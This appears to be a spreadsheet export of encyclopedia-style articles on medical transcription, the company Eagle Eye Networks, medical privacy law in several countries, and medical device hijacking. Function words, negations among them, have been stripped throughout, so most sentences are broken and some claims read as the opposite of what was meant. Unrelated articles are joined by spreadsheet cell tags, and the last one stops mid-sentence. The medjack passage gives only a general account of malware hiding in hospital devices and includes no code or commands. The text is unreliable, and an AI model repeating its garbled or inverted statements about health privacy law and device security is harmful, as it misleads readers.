commonly known patient's medical history. this record often called patient's "chart" hospital setting. medical transcription encompasses medical transcriptionist, performing document typing formatting functions according established criterion format, transcribing spoken word patient's care information written, easily readable form. proper transcription requires correct spelling terms words, correcting medical terminology dictation errors. medical transcriptionists also edit transcribed documents, print return completed documents timely fashion. transcription reports must comply medico-legal concerns, policies procedures, laws patient confidentiality. transcribing directly doctor group physicians, specific formats report types used, dependent doctor's speciality practice, although history physical exams consults mainly utilized. off-hospital sites, independent medical practices perform consultations second opinion, pre-surgical exams, imes (independent medical examinations) liability insurance disability claims. some private practice family doctors choose utilize medical transcriptionist, preferring keep patient's records handwritten format, although true family practitioners. currently, growing number medical providers send dictation digital voice files, utilizing method transcription called speech voice recognition. speech recognition still nascent technology loses much translation. dictators utilize software, must first train program recognize spoken words. dictation read database program continuously "learns" spoken words phrases.poor speech habits problems heavy accents mumbling complicate process recognition software. "flag" report unintelligible, recognition software transcribe unintelligible word(s) existing database "learned" language. result often "word salad" missing text. thresholds reject report return standard dictation, settings arbitrary. below percentage rate, word salad passes actual dictation. simultaneously listens, reads, "edits" correct version. every word must confirmed process. downside technology time spent process cancels benefits. quality recognition range excellent poor, whole words sentences missing report. infrequently, negative contractions word "not" dropped altogether. these flaws trigger concerns present technology could adverse effects patient care. control quality also reduced providers choose server-based program vendor application service provider (asp). downward adjustments rates voice recognition controversial. understandably, client seek optimum savings offset costs. vendors overstate gains productivity harm paid line. despite editing skills required mts, significant reductions compensation voice recognition reported. reputable industry sources field average increased productivity range 30–50%; still dependent several factors involved methodology. operationally, speech recognition technology (srt) interdependent, collaborative effort. mistake treat compatible organizational paradigm standard dictation, largely "stand-alone" system. software supplants mt's former ability realize immediate time-savings programming tools macros word/format expanders. requests client/vendor format corrections delay savings. remote cancel disparate style choices, recognition engine trapped seesaw battle control. voice recognition managers take care ensure impositions autonomy onerous outweigh benefits. medical transcription still primary mechanism physician clearly communicate healthcare providers access patient record, advise state patient's health past/current treatment, assure continuity care. more recently, following federal state disability changes, written report (ime) became requirement documentation medical bill application workers' compensation continuation thereof) insurance benefits based requirements federal state agencies. profession individual performs medical transcription known medical transcriber (mt) medical language specialist (mls). equipment used called medical transcriber, e.g., cassette player foot controls operated report playback transcription. education training obtained certificate diploma programs, distance learning, on-the-job training offered hospitals, although countries currently employing transcriptionists require months years specialized training. working medical transcription leads mastery medical terminology editing, ability listen type simultaneously, utilization playback controls transcriber (machine), foot pedal play adjust dictations maintaining steady rhythm execution. medical transcription training normally includes coursework medical terminology, anatomy, editing proofreading, grammar punctuation, typing, medical record types formats, healthcare documentation.while medical transcription mandate registration certification, individual seek registration/certification personal professional reasons. obtaining certificate medical transcription training program entitle title certified medical transcriptionist. certified healthcare documentation specialist (chds) credential earned passing certification examination conducted solely association healthcare documentation integrity (ahdi), formerly american association medical transcription (aamt), credentialing designation created. ahdi also offers credential registered healthcare documentation specialist (rhds). according ahdi, rhds entry-level credential chds advanced level. ahdi maintains list approved medical transcription schools. generally, certified medical transcriptionists earn non-certified counterparts. also notable training educational program approved ahdi increase chances getting certified getting hired. there great degree internal debate training program best prepares industry work. yet, whether learned medical transcription online course, community college, high school night course, on-the-job training doctor's office hospital, knowledgeable highly valued. lieu ahdi certification credentials, consistently accurately transcribe multiple document work-types return reports within reasonable turnaround-time (tat) sought after. tats service provider agreed transcriptionist reasonable consistent need return document patient's record timely manner. march 2006, occupation became eligible u.s. department labor apprenticeship, 2-year program focusing acute care facility (hospital) work. 2004, pilot program vermont residents initiated, applicants classroom pilot-program openings. objective train applicants shorter time period. (see vermont hitech pilot program established federal government health human services commission). medical transcription process when patient visits doctor, latter spends time former discussing medical problems performing diagnostic services. after patient leaves office, doctor uses voice-recording device record information patient encounter. this information recorded hand-held cassette recorder regular telephone, dialed central server located hospital transcription service office, 'hold' report transcriptionist. this report accessed medical transcriptionist, listens dictation transcribes required format medical record, medical record considered legal document. next time patient visits doctor, doctor call medical record patient's entire chart, contain reports previous encounters. doctor occasion refill patient's medications seeing medical record, although doctors prefer refill prescriptions without seeing patient establish anything changed. important properly formatted, edited, reviewed medical transcription document. medical transcriptionist accidentally typed wrong medication wrong diagnosis, patient could risk doctor designee) review document accuracy. both doctor medical transcriptionist play important role make sure transcribed dictation correct accurate. doctor speak slowly concisely, especially dictating medications details diseases conditions. medical transcriptionist must possess hearing acuity, medical knowledge, good reading comprehension addition checking references doubt. however, doctors review transcribed reports accuracy, computer attaches electronic signature disclaimer report "dictated read". this electronic signature readily acceptable legal sense. transcriptionist bound transcribe verbatim (exactly said) make changes, option flag report inconsistencies. occasions, doctors speak clearly, voice files garbled. some doctors time-challenged need dictate reports quickly reports). addition, many regional national accents (mis)pronunciations words must contend with. imperative large part transcriptionist look correct spelling complex medical terms, medications, obvious dosage dictation errors, doubt "flag" report. "flag" report requires dictator designee) fill blank finished report, returned him, considered complete. transcriptionists never permitted guess, 'just anything' report transcription. furthermore, medicine constantly changing. equipment, medical devices, medications come market daily basis, medical transcriptionist needs creative tenaciously research (quickly) find words. needs access keep memory, up-to-date library quickly facilitate insertion correctly spelled device. medical transcription editing medical transcription editing process listening voice-recorded file comparing transcribed report audio file, correcting errors needed. although speech recognition technology become better understanding human language, editing still needed ensure better accuracy. medical transcription editing also performed medical reports transcribed medical transcriptionists. medical transcription editors recent advances speech recognition technology shifted responsibilities medical transcriptionists transcribing also editing. editing always part medical transcriptionist job; however, editing larger requirement reports often transcribed electronically. with different accents, articulations, pronunciations, speech recognition technology still problems deciphering words. this medical transcriptionist editor steps medical transcription editors compare correct transcribed file voice-recorded audio file. similar medical transcription editing foot pedal education training requirements mostly same. training education education training requirements medical transcription editors similar medical transcriptionists. many medical transcription editors start medical transcriptionists transition editing. several ahdi-approved medical transcription schools seen need medical transcription editing training incorporated editing training programs. quality training success medical transcription healthcare documentation specialist. also important work experience training ensure employers willing hire freshly graduated students. students receive 'real world' training much better suited medical transcription industry, not. outsourcing medical transcription increasing demand document medical records, countries started outsource services medical transcription. main reason outsourcing stated cost advantage cheap labor developing countries, currency rates compared dollar.there volatile controversy whether medical transcription work outsourced, mainly three reasons: greater majority presently work home offices rather hospitals, working off-site "national" transcription services. predominantly nationals located united states striving outsource work other-than-us-based transcriptionists. outsourcing work sometimes lesser-qualified lower-paid non-us mts, nationals force transcriptionists accept lower rates, risk losing business altogether cheaper outsourcing providers. addition line rates forced transcriptionists, often paid (independent contractors); thus, nationals save employee insurance benefits offered, etc. unfortunately state healthcare-related administrative costs united states, outsourcing, nationals still charge hospitals rate past highly qualified transcriptionists subcontract work non-us mts, keeping difference profit. there concerns patient privacy, confidential reports going country patient located (e.g. country laws privacy patient confidentiality even exist. offshore provider clear business interest preventing data breach could prosecuted hipaa privacy laws, counter-argument made prosecution might never happen tried anywhere. some countries outsource transcription work united states britain, work outsourced philippines, india, lanka, canada, australia, pakistan barbados. quality finished transcriptions concern. many outsourced transcriptionists simply requisite basic education reasonable accuracy, well additional, occupation-specific training medical transcription. many foreign speak english familiar american expressions and/or slang doctors often use, unfamiliar american names places. editor responsible work transcribed countries conditions. these outsourced transcriptionists often work fraction transcriptionists paid united states, even daily accepting increasingly lower rates. however, firms choose employ american transcriptionists believe quality work better. references external links medical transcription curlie association healthcare documentation integrity (ahdi) american health information management association (ahima) medical transcription software joint commission accreditation healthcare organizations, accreditation manual hospitals, oakbrook terrace: jcaho, 1993.</t>
  </si>
  <si>
    <t>Eagle Eye Networks</t>
  </si>
  <si>
    <t>eagle networks, inc. american company providing cloud-based video surveillance products physical security business operations applications. history eagle networks founded 2012 dean drako, barracuda networks' founder former ceo. drako said started eagle networks result frustrations trying deploy existing video surveillance systems remote management barracuda.the company first product, eagle cloud security camera video management system, first publicly announced january 2014. company announced channel partner program following month.eagle networks announced multimillion-dollar series venture round investment july 2014, included investment michael dell's private family venture fund, capital. michael dell stated made investment primarily dean drako's prior success barracuda networks. enrique salem, prior symantec austin ventures also invested round.the company announced added data center austin, texas september 2014.in february 2015, diebold, financial self-service, security services corporation, eagle networks announced alliance deliver cloud-based video services, would stream store live recorded video, generate notifications support real-time analytics. according diebold, eagle networks developed industry's first cloud-based video solution open api.dean drako, eagle networks' ceo, wholly acquired brivo cloud access control company million june 2015. drako said opportunity accelerate cloud technology shift underway physical security industry integrating brivo's cloud access control eagle networks' cloud video surveillance. companies continue operate separate entities.in april 2017, eagle networks swift sensors announced major partnership deliver cloud-based wireless sensor video surveillance applications across multiple industries., enabling users check video needed, based sensor data.in 2020, eagle networks raised million series funding accel total $100 million since company founded 2012. company said planned funding develop artificial intelligence (ai) analytics cloud-based video surveillance platform, continue growth. products eagle cloud security camera video management system cloud-managed video surveillance system links analog cameras on-site bridge cloud managed video recorder appliance transmit encrypted video recording eagle eye's cloud data center.the system supports mobile apps system installation, remote video viewing, system management, alerts motion detection, system tampering camera malfunction. also handles bandwidth management, supports user adjustment much video stored cloud on-premises.the eagle video open restful integrators developers integrate video applications. provides storage, analytics, indexing, interfaces building integrating applications live recorded video. recognition eagle networks' initial company launch discussed many publications, including marketwatch, computerworld, wall street journal, company's focus simple design ease use.its cloud-based security camera system received award best hosted solution security industry association april 2014. company listed magazine emerging company july 2014.eagle eye's founder dean drako named goldman sachs' intriguing entrepreneurs list 2014.in november 2019, deloitte technology fast ranked eagle networks #133 fastest growing technology companies north america, 936% growth 2015 2018.in november 2020, eagle networks made deloitte technology fast list fastest-growing technology companies north america second year row. company ranked #187, 652% growth 2016 2019. acquisitions timeline external links official website references</t>
  </si>
  <si>
    <t>Medical privacy</t>
  </si>
  <si>
    <t>medical privacy health privacy practice maintaining security confidentiality patient records. involves conversational discretion health care providers security medical records. terms also refer physical privacy patients patients providers medical facility, modesty medical settings. modern concerns include degree disclosure insurance companies, employers, third parties. advent electronic medical records (emr) patient care management systems (pcms) raised concerns privacy, balanced efforts reduce duplication services medical errors.most developed countries include australia, canada, turkey, united kingdom, united states, zealand, netherlands enacted laws protecting people's medical health privacy. however, many health securing privacy laws proven less effective practice theory. united states passed health insurance portability accountability (hipaa) 1996 attempt increase privacy precautions within medical institutions. history medical privacy prior technological boom, medical institutions relied paper medium file individual's medical data. nowadays, information stored within electronic databases. research shows safer information stored within paper medium harder physically steal data, whilst digital records vulnerable access hackers.in order reform healthcare privacy issues early 1990s, researchers looked credit cards smart cards allow access medical information without fear stolen information. "smart" card allowed storage processing information stored singular microchip, people fearful much information stored single spot could easily accessed. this "smart" card included individual's social security number important piece identification lead identity theft databases breached. additionally, fear people would target medical cards information value many different third parties including employers, pharmaceutical companies, drug marketers, insurance reviewers.in response lack medical privacy, movement create better medical privacy protection, nothing officially passed. medical information bureau thus created prevent insurance fraud, since become significant source medical information life insurance companies; thus, dangerous target privacy breachers. although electronic filing system medical information increased efficiency administration costs reduced, negative aspects consider. electronic filing system allows individual's information susceptible outsiders; even though information stored singular card. therefore, medical card serves false sense security protect information completely. patient care management systems (pcms) with technological boom, expansion record filing system many hospitals therefore adopted pcms. pcms large medical records hold many individuals' personal data. these become critical efficiency storing medical information high volumes paperwork, ability quickly share information medical institutions, increased mandatory reporting government. pcms ultimately increased productivity data record utilization created large dependence technology within medical field. also social ethical issues basic human rights considered violated pcms, since hospitals health information services likely share information third party companies. thus, needs reformation specify hospital personnel access medical records. this discussion privacy rights created safeguards help data keepers understand situations ethical share individual's medical information, provide ways individuals gain access records, determine ownership records. additionally, used ensure person's identity kept confidential research statistical purposes understand process make individuals aware health information used. thus, balance privacy confidentiality must kept order limit amount information disclosed protect patient's rights safeguarding sensitive information third-parties. electronic medical records electronic medical records efficient storing medical information, many negative aspects type filing system well. hospitals willing adopt type filing system able ensure private information patients sufficiently protected.researchers found u.s. state legislation regulation medical privacy laws reduce amount hospitals adopt 24%. this decreasing positive network externalities created additional state protections. with increases restrictions diffusion medical information, hospitals neglected adopt emr's privacy laws restrict health information exchanges. with decreasing numbers medical institutions adopting filing system, u.s. government's plan national health network fully recognized. national network ultimately cost us$156 billion investments, order happen, u.s. government needs place higher emphasis protecting individual privacy. many politicians business leaders find emrs allow efficiency time money, neglect address decreasing privacy protections, demonstrating significant trade-off emrs individual privacy. privacy electronic health records (ehrs) three goals information security, including electronic information security, confidentiality, integrity, availability. organizations attempting meet goals, referred c.i.a. triad, "practice defending information unauthorized access, use, disclosure, disruption, modification, inspection, recording destruction."in 2004 editorial washington post, u.s. senators bill frist hillary clinton supported observation, stating "[patients] need...information, including access health records... time, must ensure privacy systems, undermine trust designed create". 2005 report california health care foundation found percent national respondents felt 'somewhat' 'very concerned' privacy personal medical records". importance privacy electronic health records became prominent passage american recovery reinvestment (arra) 2009. provisions (known health information technology economic clinical health [hitech] act) arra mandated incentives clinicians implementation electronic health records 2015.privacy advocates united states raised concerns unauthorized access personal data medical practices switch paper electronic medical records. office national coordinator health information technology (onc) explained safety measures systems utilize passwords numbers control access systems, encryption information, audit trail keep track changes made records. providing patient access ehrs strictly mandated hipaa's privacy rule. study found year estimated million compelled authorizations release personal health records. researchers, however, found security threats open result. some security privacy threats include hackers, viruses, worms. these privacy threats made prominent emergence "cloud computing", shared computer processing power. health care organizations increasingly using cloud computing handle large amounts data. this type data storage, however, susceptible natural disasters, cybercrime technological terrorism, hardware failure. health information breaches accounted percent breaches 2015. security costs implementations needed protect health institutions security data breaches. health screening cases although privacy issues health screening great concern among individuals organizations, little focus amount work done within maintain privacy expectation people desire. many issues within abstractness term “privacy” many different interpretations term, especially context law. prior 1994, cases regarding screening practices implications towards individual's medical privacy, unless regarding drug testing. within glover eastern nebraska community office retardation, employee sued employer violating amendment rights unnecessary testing. court ruled favor employer argued unreasonable search tested. however, precedents people use. with precedents, relationships employees employers better defined. requirements, testing among patients lead additional standards meeting health care standards. screening become large indicator diagnostic tools, concerns information gained subsequently shared people patient healthcare provider third party issues main dangers individual's privacy private corporations profits receive selling seemingly private information. privacy merchants made groups tries collect people's personal information focuses using client's information market company products. subsequently, privacy merchants purchase information companies, health insurance companies, sufficient information research. privacy merchants target health insurance companies because, nowadays, collect huge amounts personal information keep large databases. they often require patients provide information needed purposes doctors medical workers.additionally, people's information linked information outside medical field. example, many employers insurance information medical records indicator work ability ethic. selling privacy information also lead employers make much money; however, happens many people without consent knowledge. within united states, order define clear privacy laws regarding medical privacy, title thoroughly explains ownership one's data adjusted people control property. privacy 1974 offers restrictions regarding corporations access outside individual's consent.states created additional supplements medical privacy laws. with hipaa, many individuals pleased federal government take action protecting medical information individuals. people looked proof government still protecting rights corporations. many rules seen suggestions punishment compromising privacy patients minimal. even release medical information requires consent, blank authorizations allowed individuals additional consent later on.although large group people oppose selling individual's medical information, groups health benefits coalition, healthcare leadership council, health insurance association america reforms data protection ruin work profits. previous controversies, google's "project nightingale" 2019 demonstrated potential holes regulations patient data medical information. project nightingale, joint effort google healthcare network ascension, selling millions patients' identifiable medical information without consent. though google claimed process legal obtaining information, concern researchers claim. efforts protect health information with lack help department health human services conflict interest made clear. some wish place individual betterment important, others focus external benefits outside sources. issues occur problems groups also adequately solved leads controversial laws effects. individual interests take precedence benefits society whole often viewed selfish gain capital value. government make future changes current legislation, countless organizations people access individual medical information.in 1999, gramm-leach-billey (glba) addressed insurance privacy debate regarding medical privacy. yet, many issues implementation. issue inconsistent regulation requirements within different states preexisting laws. secondly, difficult combine pre-existing laws framework. thirdly, order federal government implement rules, needed state legislature pass it.glba aimed regulate financial institutions corporations could affect people's insurance. because difficulty implementation glba, state legislatures able interpret laws create initiatives protect medical privacy. when states creating independent legislature, create standards understand impact legislation. stray standard laws, must valid fair. legislation must protect rights businesses allow continue function despite federally regulated competition. patients gain benefits services standards flow information considerate medical privacy expectations.these regulations focus consumer versus benefits political exploitation. many times, regulations personal gain corporation, therefore, state legislatures wary prevent best abilities. medical privacy issue within insurance industry, problems regarding exploitation continue reoccur; focus taking advantage business environment personal gain.in 2001, president george bush passed additional regulations hipaa order better protect privacy individual medical information. these regulations supposed safeguard health information privacy creating extensive solutions privacy patients. regulation goals included notified individual's information inspected, amend medical records, request communication opportunities discuss information disclosure.however, exceptions disclosure inspected. this includes specific conditions among enforcement, judicial administrative proceedings, parents, significant others, public health, health research, commercial marketing. these aspects lack privacy caused alarming number gaps within privacy measures. ultimately, still issue ensure privacy securities; response, government created regulations makes trade offs individual's privacy public benefit. these regulations, however, still cover individually identifiable health information data contains information unique individual. however, non-identifiable data covered government claims cause minimal damage person's privacy. also covers health care organizations covers businesses well. additionally, hipaa additions, state legislation protective national laws created obligations organizations follow. ultimately, rules called expansive requirements created better safety measures individuals. yet, still ways businesses healthcare organizations exempt disclosure rules individuals. thus, needs find ways balance personal public trade offs within medical laws. this creates need extra government intervention enforce legislation standards decrease number threats individual's privacy health data. effects changing medical privacy laws physician-patient relationshipes patients want able share medical information physicians, worry potential privacy breaches occur release financial confidential medical information. order ensure better protection, government created frameworks keeping information confidential includes transparent procedures, disclosure protection information, monitoring rules ensure people's information. effects technological advances recently physicians patients started email additional communication tool treatment medical interactions. this communication “new”, effects doctor patient relationships created questions regarding legal, moral, financial problems.the american medical informatics association characterized medical emails communicate “medical advice, treatment, information exchanged professionally”; yet, “spontaneity, permanence, information power characterizing” role significant unknown affects. however, emails allows increased access, immediate aid, increased interactions patients doctors. there many benefits negative aspects using emails; doctors feel sense negative responsibility respond emails outside office, also find benefits facilitating rapid responses patient's questions.additionally, email physicians patients continue grow increasing internet. with internet, patients able medical advice treatment, issues regarding confidentiality legal issues come ultimately, emails physician patient supposed used supplement face face interactions, casual messages. used properly, physicians could emails supplement interactions provide medical need immediately. traditional beliefs doctor-patient relationship although many people believe technological changes reason fear sharing medical privacy, theory states institutional ideals doctors patients created fear sharing medical privacy information. although levels confidentiality changing, individuals often feel need share information doctors order diagnosed correctly. because this, people concerned much information physicians have. this information could transferred third party companies. however, call smaller emphasis sharing confidentiality order patients fears information breaching. there common belief confidentiality one's information also protects doctors patients, therefore negative stigma towards revealing much information. thus causes patients share vital information relevant illnesses. medical privacy standards laws country australia ehealth july 2012, australian government launched personally controlled electronic health record (pcehr) (ehealth) system. full implementation incorporates electronic summary prepared nominated healthcare providers along consumer-provided notes. further, summary include information individual's allergies, adverse reactions, medications, immunizations, diagnoses, treatments. consumer notes operate personal medical diary individual view edit. opt-in system gives people option choose whether register ehealth record not.as january 2016, commonwealth department health changed name pcehr health record. privacy governance personally controlled electronic health records 2012 privacy 1988 governs ehealth record information managed protected. pcehr system operator abides information privacy principles privacy 1988 (commonwealth) well applicable state territory privacy laws. privacy statement sets application collection personal information system operator. statement includes explanation types personal information collected, information used for, information stored. statement covers measures place protect personal information misuse, loss, unauthorized access, modification, disclosure. privacy security measures security measures include audit trails patients accessed medical records along time records accessed. other measures include encryption well secure logins passwords. patient records identified using individual health identifier (ihi), assigned medicare, service provider. privacy issues 2012 nationwide survey australia assessed privacy concerns patients' health care decisions, could impact patient care. results listed 49.1% australian patients stated withheld would withhold information health care provider based privacy concerns. consent impact privacy?one concern personal control ehealth record consent guarantee protection privacy. argued narrow definition, 'permission' 'agreement', provide protection privacy well represented australian legislation. pcehr allows clinicians assume consent consumer participation system; however, needs consumer met. critics argue broader definition 'informed consent' required, encompasses provision relevant information healthcare practitioner, understanding information patient. legitimate personal information public purposes?data pcehr predominantly used patient healthcare, uses possible, policy, research, audit public health purposes. concern case research, allowed goes beyond existing privacy legislation. what ‘illegitimate’ uses health information?the involvement pharmaceutical companies viewed potentially problematic. perceived public concerned profit public health, public acceptance pcehrs could challenged. also perceived problematic, potential parties health care practitioners, insurance companies, employers, police government, information could result discrimination disadvantage. what potential implications unwanted disclosure patient information?information 'leakage' seen potential discourage patient clinician participating system. critics argue pcehr initiative work, safe, effective continuum care within trusting patient/clinician relationship established. patients lose trust confidentiality ehealth information, withhold sensitive information health care providers. clinicians reluctant participate system uncertain completeness information. sufficient safeguards protection patient information?security experts questioned registration process, registering provide medicare card number, names birth dates family members verify identity. concerns also raised stakeholders, inherent complexities limited access features. they warn access pcehr record content, involve transfer information local system, pcehr access controls would longer apply. canada privacy patient information protected federal level provincial level canada. health information legislation established rules must followed collection, use, disclosure protection health information healthcare workers known "custodians". these custodians defined include almost healthcare professionals (including physicians, nurses, chiropractors, operators ambulances operators nursing homes). addition regulatory bodies specific healthcare workers, provincial privacy commissions central protection patient information. turkey privacy patient information guaranteed articles legal code 5510. hand, social security institution (sgk), regulates administers state-sponsored social security insurance benefits, sells patient information allegedly anonymizing data, confirmed october 2014. united kingdom national health service increasingly using electronic health records, recently, records held individual organisations, general practitioners, trusts, dentists pharmacies, linked. each organization responsible protection patient data collected. care.data programme, proposed extract anonymised data surgeries central database, aroused considerable opposition. 2003, made moves create centralized electronic registry medical records. system protected uk's government gateway, built microsoft. this program known electronic records development implementation programme (erdip). national program criticized lack security lack patient privacy. projects caused information commissioner warn danger country "sleepwalking" surveillance society. pressure groups opposed cards also campaigned centralized registry. newspapers feature stories lost computers memory sticks common longstanding problem staff accessing records right see. always possible staff look paper records, cases, track record. therefore, electronic records make possible keep track accessed records. wales created national intelligent integrated audit system provides range automatically generated reports, designed meet needs local health boards trusts, instantly identifying potential issues access legitimate". maxwell stanley consulting system called patient data protect (powered vigilancepro) spot patterns whether someone accessing data relatives colleagues. united states since 1974, numerous federal laws passed united states specify privacy rights protections patients, physicians, covered entities medical data. many states passed laws better protect medical privacy citizens. important national regarding medical privacy health insurance portability accountability 1996 (hipaa), many controversies regarding protection rights law. health insurance portability accountability 1996 (hipaa) comprehensive passed health insurance portability accountability 1996 (hipaa), later revised final omnibus rule 2013. hipaa provides federal minimum standard medical privacy, sets standards uses disclosures protected health information (phi), provides civil criminal penalties violations. prior hipaa, certain groups people protected medical laws individuals received medicare aid. hipaa provides protection health information supplements additional state federal laws; understood law's goal balance public health benefits, safety, research protecting medical information individuals. many times, privacy compromised benefits research public health. according hipaa, covered entities must follow law's mandates health plans, health care clearinghouses, health care providers electronically transmit phi. business associates covered entities also subject hipaa's rules regulations. 2008, congress passed genetic information nondiscrimination 2008 (gina), aimed prohibit genetic discrimination individuals seeking health insurance employment. also included provision mandated genetic information held employers maintained separate file prohibited disclosure genetic information except limited circumstances. 2013, gina passed, hipaa omnibus rule amended hipaa regulations include genetic information definition protected health information (phi). this rule also expanded hipaa broadening definition business associates include entity sends accesses health vendors. controversies health insurance portability accountability (hipaa) critiqued providing strong medical privacy protections provides regulations disclose certain information.the government authorizes access individual's health information “treatment, payment, health care options without patient consent”. additionally, hipaa rules broad protect individual unknown privacy threats. additionally, patient would able identify reason breach inconsistent requirements. because limited confidentiality, hipaa facilitates sharing medical information little limitation different organizations. information easily exchanged medical institutions non-medical institutions little regulation hipaa effects include loss credit score sharing loss insurance.additionally, doctors required keep patients information confidential many cases patient consent optional. patients often unaware lack privacy medical processes forms explicitly state extent protected are. physicians believe overall, hipaa cause unethical non-professional mandates affect person's privacy therefore, response provide warnings privacy concerns. because physicians able ensure person's privacy, higher chance patients less likely treatment share medical concerns are. individuals asked better consent requirements asking physicians warn prior sharing personal information. patients want able share medical information physicians, worry potential breaches release financial information confidential information fear, wary access.in order ensure better protection, government created frameworks keeping information confidential include transparent procedures, disclosure protection information, monitoring rules ensure people's information affected breaches. although many frameworks ensure protection basic medical data, many organizations provisions check. hipaa gives false hope patients physicians unable protect information. patients little rights regarding medical privacy rights physicians cannot guarantee those. hurricane katrina hipaa protect information individuals government able publish certain information find necessary. government exempted privacy rules regarding national security. hipaa additionally allows authorization protected health information (phi) order threats public health safety long follows good faith requirement idea disclosing information necessary benefit public. model state emergency powers (msehpa) gives government power “suspend regulations, seize property, quarantine individuals enforce vaccinations” requires healthcare providers give information regarding potential health emergencies".in regards hurricane katrina, many people louisiana relied medicaid subsequently affected. people's medical privacy rights soon waived order patient's treatment needed. yet, many patients unaware rights waived. order prevent sharing personal information future natural disasters, website created order protect people's medical data. ultimately, katrina showed government unprepared face national health scare. medical data outside hipaa many patients mistakenly believe hipaa protects health information. hipaa usually cover fitness trackers, social media sites health data created patient. health information disclosed patients emails, blogs, chat groups, social media sites including dedicated specific illnesses, "liking" pages diseases, completing online health symptom checkers, donating health causes. addition, credit card payments physician visit co-pays, purchase counter (otc) medications, home testing products, tobacco products, visits alternative practitioners also covered hipaa. 2015 study reported 165,000 health apps available consumers. disease treatment management account nearly quarter consumer apps. two-thirds apps target fitness wellness, percent apps collect data device sensor. since food drug administration (fda) regulates medical devices applications medical devices, require approval. data apps outside hipaa regulations share data healthcare providers. "patients mistakenly assume mobile apps scope hipaa since data, heart rate, collected application accessible physician covered hipaa, mobile accessible physician covered hipaa. changes 2000, surge regulations hipaa. included following goals: protect individual medical information providing secure access control information, improving healthcare quality creating trust consumers healthcare providers third party organizations, improve efficiency medical system rules regulations forth local governments, individuals, organizations.the implementation goals complicated change administrations (clinton bush), difficult changes successfully implemented. hipaa, theory, apply insurance companies, services, organizations, exceptions actually qualifies categories. yet, within category, specific restrictions different every category. there universal laws easily applied easy organizations follow. thus, many states neglected implement policies. additionally, patient rights call better protection disclosure health information. however, like rules regarding insurance companies, enforcement legislation limited effective broad complex. therefore, difficult many organizations ensure privacy people. enforcing requirements also causes companies spend many resources willing enforce, ultimately leads problems regarding invasion individual's medical privacy. oregon-specific laws oregon genetic privacy (gpa) states individual’s genetic information property individual”. idea individual's compared property occurred research caused individual's privacy threatened. many individuals believed genetic information “more sensitive, personal, potentially damaging types medical information.” thus, people started calling protections. people started question would able stay anonymous within research studies argued identity individual could exposed research later shared. result, call individuals treat property protect property rights. therefore, individuals control disclosure information without extra questioning research. many people believed comparing one's property inappropriate, individuals argued property privacy interconnected want protect right control one's body.many research pharmaceutical companies showed opposition worried conflicts might arise regarding privacy issues within work. individuals, hand, continued support wanted protection dna. result, lawmakers created compromise included property clause, would give individuals protection rights, also included provisions would allow research done without much consent, limiting benefits provisions. afterwards, committee created study effects affected analyzed stored. they found benefited many individuals want privacy shared others therefore officially implemented 2001. connecticut-specific laws order solve hipaa issues within connecticut, state legislatures tried create better provisions protect people living within state. issues connecticut tried solve issues consent. within consent clause, health plans health care clearinghouses need receive consent individuals general provider consent form gives healthcare providers permission disclose medical information. patient thus notification information shared afterwards.connecticut, like many states, tried protect individual's information disclosure information additional clauses would protect businesses initiatives. order connecticut legislature passed connecticut insurance information privacy protect act, provides additional protections individual medical information. third parties neglect follow law, fined, face jail time, licenses suspended. yet, even additional provisions, many holes within legislation allowed businesses agreements denied subsequently, information compromised. connecticut still working shift divergent purposes creating stringent requirements create better protections clear provisions certain policies. california-specific laws california, confidentiality medical information (cmia), provides stringent protections federal statutes. hipaa expressly provides stringent state laws like cmia, override hipaa's requirements penalties. more specifically, cmia prohibits providers, contractors health care service plans disclosing without prior authorization. these medical privacy laws also higher standard health vendors vendors individual's personal health record (phr) applying statutes vendors, even business associates covered entity. cmia also outlines penalties violating law. these penalties range liability patient (compensatory damages, punitive damages, attorneys’ fees, costs litigation) civil even criminal liability.likewise, california's insurance information privacy protection (iippa) protects unauthorized disclosure prohibiting unapproved information sharing information collected insurance applications claims resolution. zealand zealand, health information privacy code (1994) sets specific rules agencies health sector better ensure protection individual privacy. code addresses health i</t>
  </si>
  <si>
    <t>Medical device hijack</t>
  </si>
  <si>
    <t>medical device hijack (also called medjack) type cyber attack. weakness target medical devices hospital. this covered extensively press 2015 2016.medical device hijacking received additional attention 2017. this function increase identified attacks globally research released early year. these attacks endanger patients allowing hackers alter functionality critical devices implants, exposing patient's medical history, potentially granting access prescription infrastructure many institutions illicit activities. medjack.3 seems additional sophistication designed reveal searches older, vulnerable operating systems found embedded within medical devices. further, ability hide sandboxes defense tools safe (non-vm) environment. there considerable discussion debate topic 2017 event special session medjack.3. debate ensued various medical device suppliers, hospital executives audience vendors ownership financial responsibility remediate massive installed base vulnerable medical device equipment. further, notwithstanding discussion, guidance, well intended, enough remediate problem. mandatory legislation part national cyber security policy required address threat medical device hijacking, sophisticated attacker tools used hospitals, variants ransomware seem targeted hospitals. overview cyberattack attacker places malware within networks variety methods (malware-laden website, targeted email, infected stick, socially engineered access, etc.) malware propagates within network. most time existing cyber defenses clear attacker tools standard serves workstations endpoints) cyber defense software cannot access embedded processors within medical devices. most embedded operating systems within medical devices running microsoft windows windows security operating systems longer supported. relatively easy targets establish attacker tools. inside medical devices, cyber attacker finds safe harbor establish backdoor (command control). since medical devices certified, hospital cybersecurity team personnel cannot access internal software without perhaps incurring legal liability, impacting operation device violating certification. given open access, medical devices penetrated, attacker free move laterally discover targeted resources patient data, quietly identified exfiltrated. organized crime targets healthcare networks order access steal patient records. impacted devices virtually medical device impacted attack. earliest documented examples testing identified malware tools blood analyzer, magnetic resonance imaging (mri) system, computerized tomogram (ct) scan, x-ray machines. 2016 case studies became available showed attacker presence also centralized pacs imaging systems vital important hospital operations. august 2011, representatives demonstrated infected device used identify serial numbers devices within close range facilitate fatal dosage injections patients insulin pump annual blackhat conference. impacted institutions this attack primarily centers largest 6,000 hospitals global basis. healthcare data highest value stolen identity data, given weakness security infrastructure within hospitals, creates accessible highly valuable target cyber thieves. besides hospitals, impact large physician practices accountable care organizations (acos) independent physician associations (ipas), skilled nursing facilities (snfs) acute care long-term care, surgical centers diagnostic laboratories. instances there many reports hospitals hospital organizations getting hacked, including ransomware attacks, windows exploits, viruses, data breaches sensitive data stored hospital servers. community health systems, june 2014 official filing united states securities exchange commission, community health systems declared network hospitals states targets cyber-attack april june 2014. breached data included sensitive personal information million patients including social security numbers. determined attacks facilitated group china issued broad warning industry, advising companies strengthen network systems follow legal protocols help restraint future attacks. medtronic, march 2019 2019 submitted official warning concerning security vulnerabilities devices produced medtronic ranging insulin pumps various models cardiac implants. agency concluded carelink, primary mechanism used software updates addition monitoring patients transferring data implantation follow-up visits, possess satisfactory security protocol prevent potential hackers gaining access devices. recommended health care providers restrict software access established 